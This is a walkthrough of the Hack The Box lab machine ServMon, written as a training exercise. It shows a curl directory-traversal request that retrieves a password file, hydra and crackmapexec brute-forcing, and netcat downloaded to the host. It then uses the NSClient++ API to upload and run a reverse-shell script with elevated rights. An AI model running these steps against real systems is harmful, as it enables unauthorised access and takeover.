ServMon just retired on Hackthebox, it’s an easy difficulty Windows box. This was my first box ever being Windows based, it was quite new to me since I didn’t use Windows for the last 7 years. Nonetheless it was good opportunity to learn a few new tricks by getting out of my confort zone.
Overall quite enjoyed this box which is -in my opinion- the perfect opportunity to start on Windows based boxes.
Tl;Dr: To get the user flag you had to retrieve a text file containing credentials by using a File Transversal vulnerability on a Network Surveillance software running on port 80. You then find a list of two users from an open FTP server. Using the credentials list found earlier you can brute-force one of the user (
Nadine) password and grab the flag.
To get the root flag you had to exploit multiple vulnerabilities in
NSClient++ monitoring daemon to achieve Remote Code Execution as
root and read the flag.
Alright! Let’s get into the details now!
First thing first, let’s add the box IP to the hosts file:
[[email protected] ~]$ echo "10.10.10.184 servmon.htb" >> /etc/hosts
and let’s start!
Let’s start with the classic
nmap scan to see which ports are open on the box:
[[email protected] ~]$ nmap -sV -sT -sC -p- servmon.htb
We have two web app running on port 80 and 8443, SMB on port 445, the FTP port 21 and finally the SSH port 22 open.
nmap indicate that anonymous login is possible on the FTP server running on 21. It also shows that there is an
Users directory inside. Looks quite promising.
Let’s take a look by ourselves:
[[email protected] ~]$ ftp servmon.htb
Alright, since we have enough permission let’s download the whole
Users folder to browse the content more easily:
[[email protected] ~]$ wget -r ftp://anonymous:@servmon.htb/
[[email protected] ~]$ cat "servmon.htb/Users/Nathan/Notes to do.txt"
[[email protected] ~]$ cat servmon.htb/Users/Nadine/Confidential.txt
That’s interesting, according to Nadine there is a
Passwords.txt file on Nathan
Desktop. Let’s keep that in mind for later, it will probably come useful.
Now that we are done for the FTP Server let’s move on to the port 80.
Opening http://servom.htb display a following login page:
That’s an uncommon login page. A quick Google Search on
NVMS-1000 gives us the following information :
NVMS-1000 is a monitoring client which is specially designed for network video surveillance.
As with all obscure softwares let’s check if any public exploit is available.
[[email protected] ~]$ searchsploit "TVT NVMS 1000"
That sound perfect for what we need.
Given the informations we got earlier we can probably retrieve the
Passwords.txt file Nadine was talking about using this Directory Traversal vulnerability.
Reading the exploit code shows that we have to go back 12 levels to get to the root path. Let’s give it a try to retrieve the file located in
/Users/Nathan/Desktop/ (according to Nadine note):
[[email protected] ~]$ curl -i --path-as-is "http://servmon.htb/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt"
We got a few password
Since SSH is open maybe one of this password will be working for
Nathan user. Let’s use
hydra to try brute forcing it:
[[email protected] ~]$ hydra -l Nathan -P Passwords.txt 10.10.10.184 ssh
No luck but it’s maybe worth trying on
[[email protected] ~]$ hydra -l Nadine -P Passwords.txt 10.10.10.184 ssh
Alright we got Nadine account password: “LikeBigButts at Work”…? Well ok why not :P
Since the SMB port 445 is open it was also possible to brute-force using this entry point. For this one I will use
[[email protected] ~]$ crackmapexec smb 10.10.10.184 -u Nadine -p Passwords.txt
Once again we got Nadine account credentials.
We can now connect to Nadine account trough SSH and grab the flag:
[[email protected] ~]$ ssh [email protected]
So far we didn’t even need to look at what’s is running on port
8443. Since nothing is left at random on HackTheBox that’s probably our entry point to root.
Opening http://servom.htb:8443 display a following page:
The web interface is really buggy and nothing can be done from there. I don’t know if it’s intended or not but anyway let’s move on.
Out of curiosity let’s check on
searchsploit if any vulnerabilities are available for this
[[email protected] ~]$ searchsploit nsclient
Navigating to the
NSPClient++ folder allows to confirm the version running is vulnerable:
PS C:\Program Files\NSClient++> .\nscp --version
We are going to skip the
Authenticated Remote Code Execution since, well, we already have code execution on the machine as
Privilege Escalation looks exactly what we need to get to
root. Let’s take a look at it:
[[email protected] ~]$ cat /usr/share/exploitdb/exploits/windows/local/46802.txt
Sounds really good, we have the detailed exploit procedure. One problem remains, most of the configuration needed in order to setup the exploit require access to the Web Interface. Unfortunately this interface is completely buggy and unstable (at least when I was working on it), so we need to find a way to access the same feature but without using the Web Interface.
After reading the documentation a little I am confident it should be possible to do so only using the API and the
Alright let’s get into it!
First we need to retrieve the admin account password. Let’s use
nspd client to do so:
PS C:\Program Files\NSClient++> .\nscp web -- password --display
Then let’s activate
PS C:\Program Files\NSClient++> .\nscp settings --activate-module CheckExternalScripts
Now let’s download a Windows version of
netcat and create our
.bat reverse-shell script:
[[email protected] ~]$ wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
scp we can send
nc.exe to the box
[[email protected] ~]$ scp nc.exe [email protected]:C:/Temp
Let’s make sure it’s been sent correctly:
PS C:\Program Files\NSClient++> ls C:\Temp
Alright, we have everything ready now. Let’s use
NSClient++ to execute our reverse shell with elevated privileges. To do so we need to add an “External Script” and then tell
NSClient++ to execute it.
Since the Web Interface is not accessible we need to use the API. Thankfully it’s almost fully documented.
The API is only accessible from
localhost so I will open a SSH tunnel to make testing easier since I am more confortable working with
Now we are all setup. Let’s add our external script (the reverse shell) using the API:
[[email protected] ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:4444/api/v1/scripts/ext/scripts/hg8.bat --data-binary @hg8.bat
We can verify our script have been added:
[[email protected] ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT https://localhost:4444/api/v1/scripts/ext
Time to open our listener:
[[email protected] ~]$ nc -l -vv -p 8585
And use the API again to execute our script. The execute command was not so straightforward to find from the documentation but digging a little we can find it under
[[email protected] ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:4444/api/v1/queries/hg8/commands/execute"
And on our listener a new connection open, we have a shell as
[[email protected] ~]$ nc -l -vv -p 8585
That’s it folks! As always do not hesitate to contact me for any questions or feedbacks!
See you next time ;)